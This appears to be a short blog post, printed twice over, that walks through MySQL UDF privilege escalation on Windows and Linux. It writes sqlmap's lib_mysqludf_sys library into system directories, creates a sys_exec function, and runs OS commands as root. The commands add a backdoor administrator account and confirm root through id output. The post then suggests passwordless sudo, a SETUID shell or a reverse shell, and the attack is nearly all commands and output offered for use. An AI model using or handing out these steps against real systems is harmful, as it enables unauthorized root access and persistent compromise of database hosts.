Share Dialog
Share Dialog
Subscribe to int0x33
Subscribe to int0x33
<100 subscribers
<100 subscribers
We will get into making our own functions in later posts but for now, the UDF compiled shared objects from SQLMap are great.
https://github.com/int0x33/sqlmap/tree/master/udf/mysql
mysql> USE mysql;
mysql> CREATE TABLE pwn(line blob);
mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
mysql> SELECT sys_exec("net user pwned pwn123! /add");
mysql> SELECT sys_exec("net localgroup Administrators pwned /add");
mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
user@box:/$ cat /tmp/out uid=0(root) gid=0(root) groups=0(root)
You can now execute code as root, what more do you need? You can allow SUDO all no password or create SETUID shell program with c, execute a reverse shell, etc, whatever you want. Be creative.
We will get into making our own functions in later posts but for now, the UDF compiled shared objects from SQLMap are great.
https://github.com/int0x33/sqlmap/tree/master/udf/mysql
mysql> USE mysql;
mysql> CREATE TABLE pwn(line blob);
mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
mysql> SELECT sys_exec("net user pwned pwn123! /add");
mysql> SELECT sys_exec("net localgroup Administrators pwned /add");
mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
user@box:/$ cat /tmp/out uid=0(root) gid=0(root) groups=0(root)
You can now execute code as root, what more do you need? You can allow SUDO all no password or create SETUID shell program with c, execute a reverse shell, etc, whatever you want. Be creative.
No activity yet